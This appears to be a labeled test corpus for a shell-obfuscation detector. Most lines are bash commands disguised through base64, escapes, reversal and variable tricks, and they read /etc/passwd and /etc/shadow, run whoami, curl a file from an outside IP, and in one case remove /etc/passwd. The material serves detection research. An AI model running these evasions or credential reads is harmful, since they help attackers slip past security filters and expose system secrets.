[linux obfuscated]: cat${IFS}/etc/passwd

[linux obfuscated]: echo "Y2F0IC9ldGMvcGFzc3dk"|base64 -d|bash

[linux obfuscated]: a=c;b=at;c=/etc/passwd;$a$b $c

[linux obfuscated]: echo dwssap/cte/ tac | rev | bash

[not obfuscated detected]: cat /et$'c/pa\u0000/notexist/path'sswd

[linux obfuscated]: l=ppinggg;${l:1:4} 134744072

[linux obfuscated]: cat $(echo /e)tc$(echo /pa*)wd

[linux obfuscated]: test=/ehhh/hmtc/pahhh/hmsswd;cat ${test//hh??hm/};  

[linux obfuscated]: a=e; b=t; c=c; d=p; e=a; f=s; g=w; h=d; cat /$a$b$c/$d$e$f$f$g$h  

[linux obfuscated]: alphabet=fghijklmnopqrstuvwxyzabcde/;cat ${alphabet:26}${alphabet:25:1}${alphabet: -13:-12}${alphabet: -4:1}${alphabet: -1}passwd  

[linux obfuscated]: cd /&&cd&&head -1 `strings $(readlink${IFS}/????/????/????)*$(set|grep LDP|tr = ' '|awk '{print $2}')??????????d|grep ${OLDPWD}p`  

[wrong platform detected]: cat $'/e\u0`ec$(echo tset000 oh|rev)` > /dev/null/| rm /e't?/pa???d  

[linux obfuscated]: $'\143\141\164' /etc/passwd

[linux obfuscated]: $'\x70\x69\x6e\x67' 134744072

[linux obfuscated]: $'\143'$'\141'$'\164' /etc/passwd

[linux obfuscated]: $'\143'''$'\141'''""''''""''$'\164' /etc/passwd

[linux obfuscated]: t=;$'\143'''$'\141'$t''"$t"''`$t`''$'\164'  /etc/passwd

[not obfuscated detected]: $'\U00000063\U0000061\U00074' /etc/passwd

[linux obfuscated]: ${*//P\\/*} ${@/h}ba\s\h  <<< "$( "m"kd''${*/Y/*}ir -p '/tmp/[/3G'${*/2/bb}  ;  ''$'\x70'${*~~}r\i$'\156'''\t${*%%j}f  %s 'ca'  >  '/tmp/[/3G/?'; "${@^^}"""c\at '/tmp/[/3G'/?&&$'r\x6d' '/tmp/[/3G'/? ;$'\162'mdi$'\x72'  '/tmp/[/3G'&& ${@^^}mkdir  -p  '/tmp/[/J' "${@#\(}"&&''$'p\162\x69'ntf %s 't '>  '/tmp/[/J/?' ${@%%I}  &&${*//M/\*} ''$'\x63'""at '/tmp/[/J'/?  "${@%%1\\}"&&rm  '/tmp/[/J'/?; rm${@^}d${*##\}}i''r '/tmp/[/J'&&"${@%%L+}" mkd\i""${*~}r  -p  '/tmp/[/u' && "${@~}"p\ri\n$'\x74'f %s '/e' >  '/tmp/[/u/?'&&$'\x63'''a""$'\164' '/tmp/[/u'/? ;  "${@,,}"r''m '/tmp/[/u'/?&& r\mdi'r'  '/tmp/[/u';${@^^} ${*,}m'k'"${@}"di''r  -p  '/tmp/[/(';pr\in""t${@%c}f %s  'tc'  >  '/tmp/[/(/?'  && ${*/M}  cat '/tmp/[/('/? && ${*%L}r\m  '/tmp/[/('/?  &&  ''r""$'m\x64i'${*~~}r  '/tmp/[/(';${*/S2/g} mkd${@,,}i$'\x72' -p '/tmp/[/W!' &&pri"n"''\t$'\146'  %s  '/p'>'/tmp/[/W!/?'  $@ && 'c'at  '/tmp/[/W!'/?  ${*/Ck}; ''rm  '/tmp/[/W!'/?${*%w} && r$'\155d'i'r' '/tmp/[/W!';m\kdi${@/Y/X\)}r  -p  '/tmp/[/Kc' ${*~~};  p\r"""${@/H}"i''$'\156'${*/h}tf  %s 'as'> '/tmp/[/Kc/?';${*,}  ca"""${@##\9}"t '/tmp/[/Kc'/? "${@^}" ;r${@~~}m  '/tmp/[/Kc'/?&&  ${@,} "${@%TX}"r$'\x6d'${@~~}d$'\x69'r '/tmp/[/Kc'&&${@//t/2a}  mkdir -p  '/tmp/[/`'${*##mt}  && ${*} 'p'rin't'${!@}f  %s  'sw'>'/tmp/[/`/?'  ${*/S}&&  ${*//G} "c"\at  '/tmp/[/`'/?${@^^} ; ${*%^f} 'r'm '/tmp/[/`'/?; r\md""$'\151'r  '/tmp/[/`'&& ${@##9}  $'m\x6b'd${*//=\`/\!}ir -p  '/tmp/[/X' "${@/+A}" && p\rintf  %s 'd'>'/tmp/[/X/?' ${@^^}  ; $'c\x61't  '/tmp/[/X'/?  ;  ${*%*} "r"m  '/tmp/[/X'/? &&${@/n-}  rm\d$'\x69'\r  '/tmp/[/X';  "${@^^}"  'r'\mdi$'\162'  '/tmp/[';   )"

[linux obfuscated]: ${*^}   ${!#}   "${@/ATNw6s*&/T#71}"   <<<  "$(   qeDAYKhj=(  "${@//XeO,\(N}"  w  ${@//\"9yQn\)/>m\h$8j2}   ${*%\`k9%?w}   \   ${*#DN|cy} "${@%8z\N#\(}"   \/ ${@^^}   e  ${@,}  ${*~}  t "${@/\`MOVnv7/1Ep*zj}"  "${@//B\"F\}f+/QDOD\!vI}"  s $*  a   "${@^}"   ${*#BqAkCwzS}   d  ${*%%LmoR\{.L} p   ${*,}   c   "${@//A\`N9v}" "${@~~}"   ) ${*,,}  &&   for   T0dMv_7   in $((  (-(-(5#1"3"+52${*~}#2)+46#1))  ))   ${*//S\`=-c\!H}   ${@#<;E3R} $((   (-(-(-2${*^}5#"2"+7#12)+${*#0e;j%._}3"6"${*/^izp#B}#1)) )) "${@^^}" $[ ((6$@3#1*-38${@,,}#1)+"5""#"${!@}10)  ] "${@}"   $((   ((4"${@^^}"4${@^}#0+"4""8"#${*^}0)+"8"#1) ))   "${@/v.yO9,}"  $@  $[ ((-"6"$@#1*17#0)+43#2) ]  "${@//o\]<%h}"   $[  (("${@##@jg.9wU}"6${*^}2${@%%MZq6Nk}#2+${@##HvaX|^T}-4${*}8#"1")+"4""${@}"7"#"2) ]  ${*^^} $[   (-(-("6"${@~~}1#2+7"#"10)+4#11)) ]  "${@~}"   "${@/\)\":P0MJV}"  $[  ((33"#"0*"-"50#2)+9"#"1"0")   ] ${*/6\{wCNV,}  ${*#ll;D~FFl} $[   ((-12#2+3#10)+"2"${*~~}1"#""${@/t7RZ}"1) ]   ${*//nP\)<BoM}  $((  ((-4"4""#"1-8${@,,}#11)+45#i) ))  $*   $[   ((1"7"#0-${*~~}-2"4""#"${*/Bd@\]Ll\{}1)+4#11)  ]   "${@#0b\`48\)}"   ${*^^}  $((  (-(-(${!@}7#10--2${*//L\`-rG/3-$h}#1"1"0)+"${@%1\)\`B32D\\}"7#11)) ))   ${*,}  $[ (("9"#2-${*^^}-6"0"#"2")+3"3"#"1")  ] ${@,,}  $[   (-(-(${*#dT;z\[hZ4}36#14tz-"-""5"6#${*^^}e9Q)+${@/:bD<\"x}6"0"#r2X))   ]  ${*^}   $[  (("1"7#0*9#${@,,}0)+7#"1""$@"0) ]   ${@//P\!\]6VTv/B\(*mcFN>}  ;  {   p""$'\u0072'i'''n'tf %s "${qeDAYKhj[ "${@//~^1p+h\(}"   $T0dMv_7   "${@,}"  ]}"  ${*,}  ${*~~}  ;  } ; ${@#eg?sx}  ${@//3H\]&\"eJ}    )" "${@,,}"

[linux obfuscated]: echo $'\143\141\164\040\057\145\164\143\057\160\141\163\163\167\144' | bash

[linux obfuscated]: ping $((32#40G1VU+16#a))

[linux obfuscated]: $'\160\151\156\147' 134744072

[not obfuscated detected]: w$'\u0000'ho$'\u000000'ami

[linux obfuscated]: echo Y2F0IC9ldGMvcGFzc3dkCg==| base64 -d | bash

[linux obfuscated]: (  ${__[@]};________________=$?&&____________=$((________________++))&&((________=________________++))&&______________=$[________________++];_____________________=$[________________++]&&_______________________=$((________________++));__________________=$[________________++]&&__________=$((________________++))&&____________________=$[________________++];((__________________________=________________++));_________________=$[________________++]&&_________=(/????/$$/????);___________=${_________[$____________]}&&_____________=(${___________//\// })&&___________________________=${_____________[$______________]}&&___=${_____________: -$________:$________}$___________________________;______________________=${___:____________:_____________________}&&________________________=${___________________________:____________:________};____________________________=${________________________^};. <($______________________<<<_____________________________=\({$____________________________..$________________________}\))&&______________________________=(${_____________________________[@]:$____________:$______________$__________});_______=(${______________________________[@],,});_____[$____________]=${______________________________[$_______________________],,}${_______[$______________$________]}${_______[$____________]}${_______[$________$________]}&&_____[$________]=`${_____[$____________]} '{ $(:); } '$______________'>&'$________`;____________=${#_____[$________]};: ${_____[$____________]} '{ $[${_____[$________]}]; } '$______________'>&'$________&&((____________________=____________________-____________))&&______________=$((______________-____________))&&__________________________=$((__________________________-____________));__________________=$[__________________+____________]&&_____[$______________]=$______________________;_________________=$((_________________-____________))&&((_______________________=_______________________+____________))&&__________=$[__________+____________];((_____________________=_____________________-____________));________=$((________-____________));_____[$_____________________]=`${_____[$____________]} '{ ${}; } '$______________'>&'$________`;_____[$_____________________]=${_____[$_____________________]##*:}&&_____[$_______________________]=`${_____[$____________]} '{ ./!; } '$______________'>&'$________`||_____[$_______________________]=${_____[$_______________________]##*:}&&_____[$__________________]=${_____[$_____________________]:____________:_____________________}${_____[$_______________________]:_______________________:________}${_____[$_______________________]:____________________:________}&&_____[$__________]=${_____[$_______________________]:__________:________}&&_____[$____________________]=`${_____[$____________]} '{ ${_____[$__________________]} -${_____[$__________]} ";"; } '$______________'>&'$________`||_____[$__________________________]=${_____[$____________________]:$______________$_____________________:$________}&&_____[$_______________________$____________]=${_____[$_______________________]:$____________:$________};_____[$______________$______________]=${_____[$____________________]:$__________$__________________________:$________};_____[$______________$________]=${_____[$____________________]:$________$________:$________}&&_____[$________$_______________________]=${_____[$____________________]:$______________$____________________:$________}&&_____[$_____________________$_______________________]=${_____[$____________________]:$______________$________:$________}&&_____[$______________$__________________________]=${_____[$____________________]:$__________________$________:$________}&&_____[$_______________________$__________________]=${_____[$____________________]:$__________________:$________}&&_____[$________$_____________________]=${_____[$____________________]:$______________$__________:$________}&&_____[$_____________________$__________________]=${_____[$____________________]:$_______________________$_____________________:$________}&&_____[$______________$_________________]=${_____[$____________________]:$__________$_________________:$________}&&_____[$______________$_____________________]=${_____[$_____________________]:$________$__________:$________}&&_____[$__________________$________]=${_____[$____________________]:$_____________________$__________________:$________};_____[$_______________________$______________]=${_____[$_______________________]:$__________________________:$________}&&_____[$_______________________$____________________]=${_____[$____________________]:$________$_______________________:$________}&&_____[$________$________]=${_____[$_______________________]:$________$_________________:$________};_____[$______________$__________]=${_____[$____________________]:$_____________________$________:$________};_____[$_____________________$____________]=${_____[$_____________________]:$_________________:$________};_____[$________$____________________]=${_____[$_____________________]:$________$____________:$________}&&_____[$__________________$__________]=${_____[$____________________]:$__________$__________:$________};_____[$_________________]=${_____[$____________________]:$_______________________$____________:$________};_____[$__________________$_____________________]=${_____[$____________________]:$__________________$______________:$________};_____[$_______________________$_________________]=${_____[$____________________]:$______________$_______________________:$________};_____[$______________$__________________]=${_____[$____________________]:$______________$____________:$________}&&_____[$_______________________$_____________________]=${_____[$_______________________]:$________$_____________________:$________}&&_____[$_____________________$__________________________]=${_____[$_____________________]:$____________:$________};_____[$________$_________________]=${_____[$_______________________]:$________$____________:$________};_____[$_____________________$_____________________]=${_____[$_______________________]:$______________$______________:$________}&&_____[$__________________$______________]=${_____[$____________________]:$_______________________$__________:$________};_____[$_______________________$________]=${_____[$_______________________]:$_____________________:$________}&&_____[$______________$_______________________]=${_____[$____________________]:$________$______________:$________}&&_____[$______________$____________]=${_____[$_______________________]:$________$__________________________:$________};_____[$________$______________]=${_____[$_______________________]:$______________$_______________________:$________}&&_____[$__________________$_______________________]=${_____[$____________________]:$__________________$__________:$________};_____[$________$__________________]=${_____[$____________________]:$______________$_________________:$________}&&_____[$________$__________]=${_____[$____________________]:$_____________________$_______________________:$________}&&_____[$_____________________$____________________]=${_____[$_______________________]:$_________________:$________};_____[$__________________$____________]=${_____[$____________________]:$_____________________$____________:$________}&&_____[$_____________________$______________]=${_____[$_____________________]:$________$_____________________:$________}&&_____[$__________________$____________________]=${_____[$____________________]:$____________________$________:$________}&&_____[$_____________________$_________________]=${_____[$_____________________]:$_______________________:$________}&&_____[$_____________________$__________]=${_____[$____________________]:$_______________________$____________________:$________}&&_____[$_______________________$__________]=${_____[$____________________]:$_________________:$________};_____[$__________________$__________________________]=${_____[$____________________]:$____________________$_______________________:$________}&&_____[$__________________$__________________]=${_____[$____________________]:$__________$______________:$________}&&_____[$_______________________$_______________________]=${_____[$_______________________]:$________$__________:$________};_____[$_______________________$__________________________]=${_____[$____________________]:$________$____________________:$________};_____[$________$____________]=${_____[$_______________________]:$________$__________________:$________};_____[$________$__________________________]=${_____[$_____________________]:$________$_______________________:$________}&&_____[$_____________________$________]=${_____[$_____________________]:$________$________:$________}&&_____[$______________$____________________]=${_____[$____________________]:$_____________________$____________________:$________}&&${_____[$____________]} "$(${_____[$_________________]}${_____[$________$____________]}${_____[$______________$____________]}${_____[$______________$____________________]}${_____[$_____________________$_____________________]}${_____[$_____________________$____________________]} "\\$________$_______________________$_____________________";${_____[$_________________]}${_____[$________$__________________]}${_____[$________$_________________]}${_____[$______________$_________________]}${_____[$_____________________$__________]}${_____[$_____________________$____________________]} "\\$________$_______________________$________"&&${_____[$_________________]}${_____[$________$________]}${_____[$______________$________]}${_____[$______________$____________________]}${_____[$_____________________$________]}${_____[$_____________________$____________________]} "\\$________$__________$_______________________"&&${_____[$_________________]}${_____[$________$__________________]}${_____[$________$_________________]}${_____[$______________$_______________________]}${_____[$_____________________$__________________]}${_____[$_____________________$____________________]} "\\$_______________________$____________"&&${_____[$_________________]}${_____[$________$______________]}${_____[$________$_________________]}${_____[$______________$_______________________]}${_____[$_____________________$______________]}${_____[$_____________________$____________________]} "\\$__________________$____________________";${_____[$_________________]}${_____[$________$_____________________]}${_____[$________$_________________]}${_____[$______________$_____________________]}${_____[$_____________________$_______________________]}${_____[$_____________________$____________________]} "\\${_____[$__________________________]}$__________$__________________"&&${_____[$_________________]}${_____[$________$________]}${_____[$______________$________]}${_____[$______________$__________________]}${_____[$_____________________$_______________________]}${_____[$_____________________$____________________]} "\\${_____[$__________________________]}$____________________$_______________________"&&${_____[$_________________]}${_____[$________$________]}${_____[$________$__________________________]}${_____[$______________$_________________]}${_____[$_____________________$__________]}${_____[$_____________________$____________________]} "\\$________$_______________________$_____________________";${_____[$_________________]}${_____[$________$_____________________]}${_____[$________$__________________________]}${_____[$______________$__________________________]}${_____[$_____________________$______________]}${_____[$_____________________$____________________]} "\\$__________________$____________________"&&${_____[$_________________]}${_____[$________$________]}${_____[$______________$______________]}${_____[$______________$__________________]}${_____[$_____________________$_____________________]}${_____[$_____________________$____________________]} "\\$________$__________$____________"&&${_____[$_________________]}${_____[$________$__________________]}${_____[$________$__________________________]}${_____[$______________$____________________]}${_____[$_____________________$________]}${_____[$_____________________$____________________]} "\\${_____[$__________________________]}$__________$________"&&${_____[$_________________]}${_____[$________$__________________]}${_____[$________$____________________]}${_____[$______________$_____________________]}${_____[$_____________________$__________________]}${_____[$_____________________$____________________]} "\\$________$__________$_____________________";${_____[$_________________]}${_____[$________$_______________________]}${_____[$________$____________________]}${_____[$______________$____________________]}${_____[$_____________________$__________]}${_____[$_____________________$____________________]} "\\$________$__________$_____________________";${_____[$_________________]}${_____[$________$______________]}${_____[$______________$________]}${_____[$______________$____________________]}${_____[$_____________________$____________]}${_____[$_____________________$____________________]} "\\${_____[$__________________________]}$____________________$____________________"&&${_____[$_________________]}${_____[$________$____________]}${_____[$______________$____________]}${_____[$______________$_______________________]}${_____[$_____________________$__________________]}${_____[$_____________________$____________________]} "\\$________$_______________________$_______________________")" )

[linux obfuscated]: ${*~~} $BASH ${*//%R/a}  <<<  "$(  G5='CAT /ETC/PASSWD'  ${*%i} ; ${*,}  p"r"""i'n'tf %s  "${G5~~}"  ; "${@,}"  )"

[linux obfuscated]: "cat $(echo /e)tc$(echo /pa*)wd

[linux obfuscated]: cat $(echo /e)tc$(echo /ho)sts

[linux obfuscated]: c$(echo a)t $(echo /et*)/s$(echo had)ow"

[linux obfuscated]: "a=c;b=a;d=t;e=/;f=e;g=p;h=s;l=w;m=d;$a$b$d $e$f$d$a$e$g$b$h$h$l$m		#cat /etc/passwd

[linux obfuscated]: a=w;b=h;c=o;d=a;e=m;f=i;$a$b$c$d$e$f		#whoami

[linux obfuscated]: a=c;b=u;d=rl;e=htt;f=p://;g=111.230;h=.224.212/;l=version.txt;$a$b$d $e$f$g$h$l		#curl http://121.230.224.212/version.txt"

[linux obfuscated]: cat /et*/h**pd/c*nf/h**pd.*

[linux obfuscated]: "c$(echo a)t $(echo /e)t$(echo c/)p$(echo a)ss$(echo w)d

[linux obfuscated]: pi$(echo n)g mirr$(echo 0r.)top

[linux obfuscated]: l$(echo s) $(echo /v)a$(echo r/)ww$(echo w/)html"

[linux obfuscated]: "a=c;b=a;d=t;e=/;f=e;g=p;h=s;l=w;m=d;$a$b$d $e$f$d$a$e$g$b$h$h$l$m		#cat /etc/passwd

[linux obfuscated]: a=w;b=h;c=o;d=a;e=m;f=i;$a$b$c$d$e$f		#whoami

[linux obfuscated]: a=c;b=u;d=rl;e=htt;f=p://;g=111.230;h=.224.212/;l=version.txt;$a$b$d $e$f$g$h$l		#curl http://121.230.224.212/version.txt"

[linux obfuscated]: "$(echo -n ""Y2F0IC9ldGMvcGFzc3dk""|base64 -d)

[linux obfuscated]: $(echo -n ""bHMgL2V0Yy8=""|base64 -d)

[linux obfuscated]: $(echo -n ""Y2F0IC91dGMvaG9zdHM=""|base64 -d)"

[linux obfuscated]: ${*//u<}  $'e\x76'''al "$( pr""\in"t"\f "\x$(  pri\n't'$'\146'  %s 'q' |${@/y} ''m'd'''5s"${@^}"um|''"c"u''t  -b  $[((29#1*3#10)+5#11)  ]-$(( ((-58#1*41#2)+4#30) ))  ${*//L=/\)~})"${*}&& ${*,,}pr"i"n${*%,\[}tf  "\x$(${*/C}p''ri${*#3}nt'f' %s 'x' "${@~~}"  |"${@}"md5""su$'\155' ${*^^} |cu$'\164'  -b  $[((4#10-2#11)+6#10)]-$(((-(-(15#10-3#11)+2#11)))) )""${@%J}"  ; ${*##+}  p''r"i"nt\f "\x$(${*//H^/H}"${@,,}"prin$'\164'f %s ']Y' |  \m''d5$'\x73\165'"m"${*//&}|  ${*%%W} cu""${*//4}t  -b  $[ (-(-(3#12+2#1001)+6#10))]-$[  (-(-(3#10*3#10)+39#0))])"  && ${*^^}  $'\160'rin"${@##G}"tf "\x$(${*^} 'p'\ri\n"t"\f %s  '1' |  ${@~~}md5$'\x73'um${*##L\}}|  "$@"  cu\t  -b $[(-(-(62#c+32#l)+63#h))]-$[  (-(-(-2#11--41#q)+4#12))] )" &&  ${*^} prin't'f "\x$( prin''tf  %s 'mk'|m$'\1445'''\s''$'\165'm${@,}|  \c\ut -b  $((  (-(-(14#14+3#10)+56#2))  ))-$(( ((-2#100*-3#10)+3#22) ))  ${@%r}  )"${*##j}  &&  $*  \p''ri${!@}n${*/<a}t''${!@}f  "\x$( ${@/8E} p${@~}ri""ntf  %s  'ij'${@~}  |  $'m\1445'""su$'\x6d'"${@##h1}"| ${@,}cut -b $[  ((-4#1*61#1)+6#10) ]-$[ ((-5#11+2#100)+4#20)]"${@//w}" )"  ;  pri"n"$'\164'f  "\x$("${@#E}"p""rint''"${@##~}"f  %s  '7#'${*%%\[}  | ${*,}  "m""d"5\su""$'\155'  |$'\143u'""${@^}t  -b $((((-23#25+2#1111)+7#121)  ))-$[ (-(-(55#u--28#d)+39#e)) ])"  ${@##r3} && ${*##Qf} p"r"i''n$'\x74'f "\x$( "p"rint$'\x66' %s 'TR'| md${*##<}5$'\x73'um  "${@#D}"  |${*##2}cu''t -b  $((  ((-3#10*-6#11)+3#100)))-$((  ((40#w-15#c)+31#b) ))${*//k@/Y})"; ""$'\160r'in''t$'\x66' "\x$(${*~}  $'\160'${@,,}r""in"t"f %s  '2' ${*,,} |md5sum |  ${*//mV/h} ''c'u't -b $[  ((-63#a-6#10)+11#27)]-$((  (-(-(2#11+33#g)+3#12))  )) )"  ;  "${@}"p$'\x72'"${@#i}"in$'\164'f "\x$( pr\intf  %s ']'  |${@%%Xp}  $'m\144'\5""\s$'\x75'${*~~}m  ${*//5l}  |${*/S}  ""cut -b $(( ((2#11*-4#12)+48#B)  ))-$[  ((-45#w+-3#22)+58#12)] "${@#DX}" )";${@~~} p${*%.U}ri""\ntf "\x$( ${*#|}$'\x70'${!*}r""intf  %s  'X'  | m''d\5s${*//&J}u\m "${@//V}"  |  ${*^}c'u'""t -b $[((3#21+44#1)+47#1) ]-$[  ((2#11*51#2)+4#10)] )"  &&  ${*/qR}  pr'i'n''t\f "\x$(  prin"t"$'\146' %s 'uW'| ${*^} md5s\u"""m"|  "c"""ut -b $[  ((7#0*50#0)+60#1) ]-$[ (-(-(2#11--3#11)+2#101))  ] ${@}  )"  "${@#,}" &&  "${@/g\{}" p\r\i""nt\f "\x$(  p''r$'i\x6e'"t"'f' %s 'c'  |  md5sum "${@%\)h}" | \cut -b $((((-4#11--17#g)+3#10)  ))-$[ ((9#10+-14#b)+21#h)] ${@~~})"  $*  && p'r'i$*ntf  "\x$(pr\i$'\x6e'"t"f %s ']'|  "${@^^}"  $'\155'd5s"u"m  ${@~~}|''c$'\165't  -b  $[  (-(-(13#a--46#c)+43#g))]-$[  ((41#1+33#0)+5#11) ])"  ${*} ; pri${*~~}ntf "\x$( p\rin\tf %s  'b3'  ${*^^}|${@//a/6} $'m\1445's"""u"m ${*##v}|${@~} c"${@~}"ut -b  $[ ((-39#c*5#10)+19#48)  ]-$(((-(-(21#27-12#18)+4#10))  ))  "$@" )"  ${*,}    )"  

[linux obfuscated]: ${*%%8}  $'\x70'rin't'f %s  "$(    YT='CAT /ETC/PASSWD'  ;  ${*%e}\pr""intf  %s "${YT~~}"${@##,}   )" ${*,}|${!#} 

[linux obfuscated]: ${*//;N} printf  %s  "$(  jp=(s $* t w e "${@/n>}" p  \   ${*^^}  c d  \/  a${@/\)}  ) ;  for aj  in  $(((-(-(5#10--7#11)+4#13))  ))  "${@/G&/\(c}"  $((  ((-4#10+2#111)+4#12) )) $* $(( ((49#0-40#0)+19#1))) ${*} $((  (-(-(2#101--6#12)+7#11)))) $((((3#10*42#1)+3#12)))  "${@//1A}" $((  ((-2#101+3#10)+2#101))) "${@/k\!/K\{}"  $[(-(-(55#2-30#0)+58#1)) ] ${@,} $[ ((55#1*7#2)+2#100)]  $[ ((3#10--4#10)+9#1) ]  $((  (-(-(7#11--2#111)+11#10))  ))  ${*,,}  $[((3#10+-3#11)+9#11)]  $[  ((-56#jTN+-6#1414501)+30#58ke)] $[  (-(-(32#51uh--56#zrO)+40#4d93))]  "${@~~}" $(( (-(-(34#0--2#11)+38#1))  ))  $((((-23#b+-3#10)+28#l) )) ${*%%_#}  ;{  pr''i\n$'\x74'f  %s  "${jp[$aj]}" ;  } ;  ${*/6/.#}  )"  ${*} | $BASH${*,} 

[linux obfuscated]: "$@"b${@/io}a$'\163'h ${*~~}  <<<  "$(   $'\160'r''in"$@"tf  %s  'dwssap/cte/ tac' ${@##H9}  | "$@""${@//9}"r${*,}ev  ;  )"  

[linux obfuscated]: "${@##b\[}"  ''e''\v\a$'\x6c' "$(   ${*//._}pri\nt'f'  "\x$(p""rin${!@}t"${@%%%}"f %s 'lJ'${*,} |  m${@^}d5sum ${*#\!} |  ${*/b/\[} cu""t -b  $[(-(-(8#10+8#20)+8#12))]-$((((-36#d+-4#11)+21#1c)))  )"  ; p$'r\151'''n\tf "\x$(  p"r"\i\ntf  %s  '^9' ${*^} | m'd'5\sum |${*,}  $'\143'ut  -b  $[ ((33#0*32#1)+2#11)]-$((((4#2-51#0)+55#2) ))  )"&& ${@##\]\)}pr\i''n${@#-}t${*%EB}f "\x$(  p""rint${*//iG/H}f %s  'u' |md\5su\m|  cu't'  -b  $((  ((-3#22+13#0)+12#10) ))-$[ (-(-(53#2--2#1001)+6#10))  ] )"  && $'\x70''r''i'n${*%%\"}t\f  "\x$( ${@//d} pr""i${@^^}nt''f  %s 'K9'| ${*%t}m\d5''${*^^}sum "${@,}" | ${@##$-} c'u't -b  $[  ((-56#1+17#0)+23#2)]-$[  ((29#1*16#0)+46#2) ] )" ;  "${@^}" pri${*%%\!N}n${@^^}tf "\x$( pr''in$'t\x66' %s 'rF' ${*^^}|md$'\65'su"m" ${@##+} | c'u't  -b  $[  (-(-(4#13*4#10)+3#100))]-$[ ((-35#1*-39#1)+46#j)]${*##4l})"  ;  ${*^^} print\f "\x$(${*#W<} prin""t${@%P\`}f %s 'n'  |  ${@//\`O}md\5"${@/\(/JM}"s${*%%;}u\m |cut  -b  $(((-(-(5#11--6#12)+6#12))  ))-$(( ((-37#2+-3#12)+46#e)  ))  )"; $'\x70'ri''ntf  "\x$( p''rintf  %s  'i'${@//<M/wy}|"${@%%JV}"''\md"5"s"${@//hC}"um | ${*%%:*}  $'\x63''u't  -b $((  ((-6#10+-4#21)+20#25) ))-$[ ((-3#11-8#17)+4#302) ]  )"${*^}  ;pr"${@}"int"f" "\x$("${@%9}" prin't'f %s '.'|m''d5\s$'u\x6d'  ${*^}  | ${*} cut  -b $(( ((23#c-24#2)+3#10)))-$[ ((-18#b-52#f)+42#E)  ]  ${@^}  )" &&  p""r'''i'n\tf  "\x$(  "p"r"i"n't'${@%a9}f %s 't'|  md5\su$'\x6d' |$'\x63'${*}ut  -b  $[ (-(-(-4#11*-3#12)+4#21)) ]-$((  ((-54#a+33#q)+19#1)  ))"${@//1g}" )" &&  "${@}" pr"${@//\]>}"i$'\156't'f'  "\x$(  ${*~}p""$'\x72'i""'n'${*//AJ/R}tf %s ']' |  ${*,}m""d5''s\um |  cu${@%6}t  -b $((  ((-2#100*-2#100)+3#10)))-$((  ((-49#o+-6#10)+25#20) ))  )" && $*  ${!*}printf "\x$(${*~}""\pri\ntf %s 'M'| ${*~~}  m''d5${!@}s"u""${@%2}"m |  $'\x63'ut  -b  $[(-(-(27#1d--11#29)+20#28)) ]-$[ ((-56#c*5#12)+47#2e) ]  )"  ${@/CK/pd} && $'\x70'\r$'\x69'n"t"\f  "\x$(  ""p$'\x72''i'ntf %s 'KG'${*~~}|${*%~}  md5""su""m  ${*^}|$'\x63'${@^}ut -b $(((-(-(11#25--42#j)+6#42)) ))-$((((3#10*4#10)+5#14))) )"${*~~}  && ${!@}${*,,}p\ri${!*}ntf  "\x$( p''rin''t"${@%%>}"f %s  '?a' |  md5sum ${*,,}  | ${*,,}  ''cut  -b  $(((-(-(26#m--28#q)+53#z))  ))-$(((-(-(38#r--51#2)+5#30))  )))"  ${*~~} ;$'\x70''r'$'\151n'''tf "\x$( pri'n'${*%p}tf  %s  '`'|  ${@,} ''md5s"u"m$*| ${*^^}${@}cu\t  -b  $(( ((43#w-6#23)+16#b)))-$(((-(-(52#c*2#100)+39#j)) ))  )"  ${@,} ;  ""pr"i"n""t"f" "\x$(print"$@"f  %s ':' ${*/=B} |  ${*%8=} $'m\144\x35'su$'\x6d'${!@}  |"${@//|z}" c'''u't  -b  $[((-25#2--3#11)+42#o) ]-$(((-(-(35#g+16#32)+13#30))  ))  )"  )"

[linux obfuscated]: "${@^}" \p\r"i"n""$'\x74'f  %s  "$(    ${*##~N}  r\ev  <<< 'dwssap/cte/ tac'  ${*//V+/n\(}  ;   )"|  \b$'\x61's${*//,}h

[linux obfuscated]: e""v$'a\x6c'  "$(    "${@%%.}"p$'\x72'\intf  %s 'dwssap/cte/ tac' |  ${*,,}  $'\x72'e${*//\"k}v  ${@,} )" 
